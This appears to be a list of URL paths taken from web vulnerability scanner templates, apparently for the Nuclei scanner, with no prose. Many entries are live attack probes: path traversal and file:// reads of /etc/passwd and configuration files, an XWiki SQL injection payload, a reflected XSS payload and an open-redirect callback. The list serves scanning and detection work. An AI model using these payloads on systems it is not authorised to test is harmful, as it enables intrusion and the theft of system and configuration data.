/hx/resources/public/$SCHEMAS$?Filename=c%3a%5cwindows%5cwin.ini
/index.php?mod=textviewer&src=file:///etc/passwd
/trufusionPortal/jsp/internal_admin_contact_login.jsp
/unified-console.html
/controlloLogin.js
/{{path}}
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id

/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-admin/admin-ajax.php
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.
/?PagePrincipale/upload&file=%22%3E%3Csvg/onload=alert(document.domain)%3E
/auth/failure?provider={{redirect_payload}}
/auth/failure?provider={{basic_xss}}
/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName
/{{js_file_url}}
{{path}}
/download_work_dir_file?path=/etc/passwd
/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg
/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false
/webapps/xwiki/WEB-INF/xwiki.properties
/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg
/geoserver/wfs?service=WMS&request=GetMap
/wfs?service=WMS&request=GetMap
/wp-json/atarim/v1/db/vc
/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
/urve/site/login.html?lang=en
/_internal/redirect.php?url=http://{{interactsh-url}}
/user/login
/
/login_ok.htm
/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml
/wp-json/wp/v2/pages?per_page=100
/helpdesk/WebObjects/Helpdesk.woa
